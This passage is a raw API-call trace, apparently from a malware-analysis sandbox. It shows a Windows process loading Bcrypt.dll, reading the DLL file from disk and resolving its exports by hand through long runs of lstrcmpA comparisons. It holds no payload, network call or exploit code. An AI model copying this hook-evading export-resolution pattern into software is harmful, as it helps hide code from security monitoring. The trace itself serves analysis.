(lpString1="DAD_DragEnterEx2", lpString2="CIDLData_CreateFromIDArray") returned 1 [0166.311] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CStorageItem_GetValidatedStorageItemObject") returned 1 [0166.311] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CheckEscapesW") returned 1 [0166.311] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CommandLineToArgvW") returned 1 [0166.312] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="Control_RunDLL") returned 1 [0166.312] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="Control_RunDLLA") returned 1 [0166.312] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="Control_RunDLLAsUserW") returned 1 [0166.312] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="Control_RunDLLW") returned 1 [0166.312] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0166.312] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0166.312] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0166.312] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0166.312] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0166.312] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 1 [0166.815] GetProcessHeap () returned 0x450000 [0166.815] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x410d040 | out: hHeap=0x450000) returned 1 [0167.534] GetProcessHeap () returned 0x450000 [0167.535] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x10) returned 0x469340 [0167.535] LoadLibraryA (lpLibFileName="Bcrypt.dll") returned 0x7ffc5bcc0000 [0167.543] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0167.543] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0167.543] GetModuleFileNameA (in: hModule=0x7ffc5bcc0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\Bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")) returned 0x1e [0167.543] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\Bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0167.544] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0167.544] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0167.544] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=159648) returned 1 [0167.544] GetProcessHeap () returned 0x450000 [0167.544] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x26fa0) returned 0x2d42010 [0167.546] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0167.546] ReadFile (in: hFile=0x15c, lpBuffer=0x2d42010, nNumberOfBytesToRead=0x26fa0, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2d42010*, lpNumberOfBytesRead=0x14f5a4*=0x26fa0, lpOverlapped=0x0) returned 1 [0167.549] CloseHandle (hObject=0x15c) returned 1 [0167.550] lstrcmpA (lpString1="BCryptAddContextFunction", lpString2="BCryptAddContextFunction") returned 0 [0167.550] lstrcmpA (lpString1="BCryptAddContextFunctionProvider", lpString2="BCryptAddContextFunction") returned 1 [0167.550] lstrcmpA (lpString1="BCryptAddContextFunctionProvider", lpString2="BCryptAddContextFunctionProvider") returned 0 [0167.550] lstrcmpA (lpString1="BCryptCloseAlgorithmProvider", lpString2="BCryptAddContextFunction") returned 1 [0167.550] lstrcmpA (lpString1="BCryptCloseAlgorithmProvider", lpString2="BCryptAddContextFunctionProvider") returned 1 [0167.550] lstrcmpA (lpString1="BCryptCloseAlgorithmProvider", lpString2="BCryptCloseAlgorithmProvider") returned 0 [0167.550] lstrcmpA (lpString1="BCryptConfigureContext", lpString2="BCryptAddContextFunction") returned 1 [0167.550] lstrcmpA (lpString1="BCryptConfigureContext", lpString2="BCryptAddContextFunctionProvider") returned 1 [0167.550] lstrcmpA (lpString1="BCryptConfigureContext", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0167.550] lstrcmpA (lpString1="BCryptConfigureContext", lpString2="BCryptConfigureContext") returned 0 [0167.550] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptAddContextFunction") returned 1 [0167.550] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptAddContextFunctionProvider") returned 1 [0167.550] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0167.550] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptConfigureContext") returned 1 [0167.550] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptConfigureContextFunction") returned 0 [0167.550] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptAddContextFunction") returned 1 [0167.550] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptAddContextFunctionProvider") returned 1 [0167.550] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0167.550] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptConfigureContext") returned 1 [0167.550] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptConfigureContextFunction") returned 1 [0167.550] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptCreateContext") returned 0 [0167.550] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptAddContextFunction") returned 1 [0167.551] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptAddContextFunctionProvider") returned 1 [0167.551] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0167.551] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptConfigureContext") returned 1 [0167.551] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptConfigureContextFunction") returned 1 [0167.551] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptCreateContext") returned 1 [0167.551] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptCreateHash") returned 0 [0167.551] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptAddContextFunction") returned 1 [0167.551] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptAddContextFunctionProvider") returned 1 [0167.551] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0167.551] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptConfigureContext") returned 1 [0167.551] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptConfigureContextFunction") returned 1 [0167.551] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptCreateContext") returned 1 [0167.551] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptCreateHash") returned 1 [0167.551] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptCreateMultiHash") returned 0 [0167.551] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptAddContextFunction") returned 1 [0167.551] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptAddContextFunctionProvider") returned 1 [0167.551] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0167.552] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptConfigureContext") returned 1 [0167.552] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptConfigureContextFunction") returned 1 [0167.552] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptCreateContext") returned 1 [0167.552] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptCreateHash") returned 1 [0167.552] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptCreateMultiHash") returned 1 [0167.552] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptDecrypt") returned 0 [0167.552] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptAddContextFunction") returned 1 [0167.552] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptAddContextFunctionProvider") returned 1 [0167.552] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0167.552] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptConfigureContext") returned 1 [0167.552] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptConfigureContextFunction") returned 1 [0167.552] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptCreateContext") returned 1 [0167.552] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptCreateHash") returned 1 [0167.552] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptCreateMultiHash") returned 1 [0167.552] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptDecrypt") returned 1 [0167.552] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptDeleteContext") returned 0 [0167.552] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptAddContextFunction") returned 1 [0167.552] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptAddContextFunctionProvider") returned 1 [0167.552] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0167.552] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptConfigureContext") returned 1 [0167.552] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptConfigureContextFunction") returned 1 [0167.553] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptCreateContext") returned 1 [0167.553] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptCreateHash") returned 1 [0167.553] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptCreateMultiHash") returned 1 [0167.553] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptDecrypt") returned 1 [0167.553] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptDeleteContext") returned 1 [0167.553] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptDeriveKey") returned 0 [0167.553] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptAddContextFunction") returned 1 [0167.553] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptAddContextFunctionProvider") returned 1 [0167.553] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0167.553] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptConfigureContext") returned 1 [0167.553] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptConfigureContextFunction") returned 1 [0167.553] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptCreateContext") returned 1 [0167.553] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptCreateHash") returned 1 [0167.553] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptCreateMultiHash") returned 1 [0167.553] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptDecrypt") returned 1 [0167.553] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptDeleteContext") returned 1 [0167.553] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptDeriveKey") returned 1 [0167.553] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptDeriveKeyCapi") returned 0 [0167.553] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptAddContextFunction") returned 1 [0167.553] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptAddContextFunctionProvider") returned 1 [0167.553] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0167.553] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptConfigureContext") returned 1 [0167.553] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptConfigureContextFunction") returned 1 [0167.553] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptCreateContext") returned 1 [0167.553] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptCreateHash") returned 1 [0167.553] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptCreateMultiHash") returned 1 [0167.553] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDecrypt") returned 1 [0167.553] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDeleteContext") returned 1 [0167.553] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDeriveKey") returned 1 [0167.553] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDeriveKeyCapi") returned 1 [0167.553] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDeriveKeyPBKDF2") returned 0 [0167.554] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptAddContextFunction") returned 1 [0167.554] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptAddContextFunctionProvider") returned 1 [0167.554] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0167.554] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptConfigureContext") returned 1 [0167.554] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptConfigureContextFunction") returned 1 [0167.554] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptCreateContext") returned 1 [0167.554] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptCreateHash") returned 1 [0167.554] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptCreateMultiHash") returned 1 [0167.554] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDecrypt") returned 1 [0167.554] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDeleteContext") returned 1 [0167.554] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDeriveKey") returned 1 [0167.554] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDeriveKeyCapi") returned 1 [0167.554] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0167.554] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDestroyHash") returned 0 [0167.554] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptAddContextFunction") returned 1 [0167.554] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptAddContextFunctionProvider") returned 1 [0167.554] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0167.554] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptConfigureContext") returned 1 [0167.554] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptConfigureContextFunction") returned 1 [0167.554] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptCreateContext") returned 1 [0167.554] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptCreateHash") returned 1 [0167.554] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptCreateMultiHash") returned 1 [0167.554] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDecrypt") returned 1 [0167.554] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDeleteContext") returned 1 [0167.554] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDeriveKey") returned 1 [0167.554] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDeriveKeyCapi") returned 1 [0167.555] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0167.555] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDestroyHash") returned 1 [0167.555] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDestroyKey") returned 0 [0167.555] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptAddContextFunction") returned 1 [0167.555] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptAddContextFunctionProvider") returned 1 [0167.555] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0167.555] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptConfigureContext") returned 1 [0167.555] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptConfigureContextFunction") returned 1 [0167.555] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptCreateContext") returned 1 [0167.555] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptCreateHash") returned 1 [0167.555] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptCreateMultiHash") returned 1 [0167.555] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDecrypt") returned 1 [0167.555] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDeleteContext") returned 1 [0167.555] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDeriveKey") returned 1 [0167.555] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDeriveKeyCapi") returned 1 [0167.555] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0167.555] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDestroyHash") returned 1 [0167.555] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDestroyKey") returned 1 [0167.555] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDestroySecret") returned 0 [0167.555] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptAddContextFunction") returned 1 [0167.555] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptAddContextFunctionProvider") returned 1 [0167.555] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0167.555] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptConfigureContext") returned 1 [0167.555] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptConfigureContextFunction") returned 1 [0167.556] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptCreateContext") returned 1 [0167.556] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptCreateHash") returned 1 [0167.556] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptCreateMultiHash") returned 1 [0167.556] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDecrypt") returned 1 [0167.556] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDeleteContext") returned 1 [0167.556] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDeriveKey") returned 1 [0167.556] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDeriveKeyCapi") returned 1 [0167.556] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0167.556] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDestroyHash") returned 1 [0167.556] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDestroyKey") returned 1 [0167.556] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDestroySecret") returned 1 [0167.556] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDuplicateHash") returned 0 [0167.556] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptAddContextFunction") returned 1 [0167.556] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptAddContextFunctionProvider") returned 1 [0167.556] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0167.556] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptConfigureContext") returned 1 [0167.556] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptConfigureContextFunction") returned 1 [0167.556] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptCreateContext") returned 1 [0167.556] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptCreateHash") returned 1 [0167.556] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptCreateMultiHash") returned 1 [0167.556] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDecrypt") returned 1 [0167.556] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDeleteContext") returned 1 [0167.556] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDeriveKey") returned 1 [0167.556] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDeriveKeyCapi") returned 1 [0167.556] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0167.556] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDestroyHash") returned 1 [0167.556] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDestroyKey") returned 1 [0167.556] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDestroySecret") returned 1 [0167.556] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDuplicateHash") returned 1 [0167.556] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDuplicateKey") returned 0 [0167.652] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptAddContextFunction") returned 1 [0167.653] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptAddContextFunctionProvider") returned 1 [0167.653] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0167.653] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptConfigureContext") returned 1 [0167.653] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptConfigureContextFunction") returned 1 [0167.653] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptCreateContext") returned 1 [0167.653] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptCreateHash") returned 1 [0167.653] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptCreateMultiHash") returned 1 [0167.653] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDecrypt") returned 1 [0167.653] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDeleteContext") returned 1 [0167.653] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDeriveKey") returned 1 [0167.653] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDeriveKeyCapi") returned 1 [0167.653] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0167.653] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDestroyHash") returned 1 [0167.653] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDestroyKey") returned 1 [0167.653] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDestroySecret") returned 1 [0167.653] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDuplicateHash") returned 1 [0167.653] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDuplicateKey") returned 1 [0167.653] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptEncrypt") returned 0 [0167.653] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptAddContextFunction") returned 1 [0167.653] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptAddContextFunctionProvider") returned 1 [0167.653] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0167.653] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptConfigureContext") returned 1 [0167.653] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptConfigureContextFunction") returned 1 [0167.653] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptCreateContext") returned 1 [0167.654] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptCreateHash") returned 1 [0167.654] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptCreateMultiHash") returned 1 [0167.654] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDecrypt") returned 1 [0167.654] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDeleteContext") returned 1 [0167.654] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDeriveKey") returned 1 [0167.654] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDeriveKeyCapi") returned 1 [0167.654] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0167.654] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDestroyHash") returned 1 [0167.654] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDestroyKey") returned 1 [0167.654] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDestroySecret") returned 1 [0167.654] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDuplicateHash") returned 1 [0167.654] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDuplicateKey") returned 1 [0167.654] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptEncrypt") returned 1 [0167.654] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptEnumAlgorithms") returned 0 [0167.654] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptAddContextFunction") returned 1 [0167.654] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptAddContextFunctionProvider") returned 1 [0167.654] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0167.654] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptConfigureContext") returned 1 [0167.654] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptConfigureContextFunction") returned 1 [0167.654] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptCreateContext") returned 1 [0167.654] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptCreateHash") returned 1 [0167.654] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptCreateMultiHash") returned 1 [0167.654] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDecrypt") returned 1 [0167.654] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDeleteContext") returned 1 [0167.655] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDeriveKey") returned 1 [0167.655] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDeriveKeyCapi") returned 1 [0167.655] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0167.655] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDestroyHash") returned 1 [0167.655] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDestroyKey") returned 1 [0167.655] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDestroySecret") returned 1 [0167.655] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDuplicateHash") returned 1 [0167.655] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDuplicateKey") returned 1 [0167.655] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptEncrypt") returned 1 [0167.655] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptEnumAlgorithms") returned 1 [0167.655] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptEnumContextFunctionProviders") returned 0 [0167.655] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptAddContextFunction") returned 1 [0167.655] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptAddContextFunctionProvider") returned 1 [0167.655] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0167.655] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptConfigureContext") returned 1 [0167.655] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptConfigureContextFunction") returned 1 [0167.655] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptCreateContext") returned 1 [0167.655] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptCreateHash") returned 1 [0167.655] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptCreateMultiHash") returned 1 [0167.656] 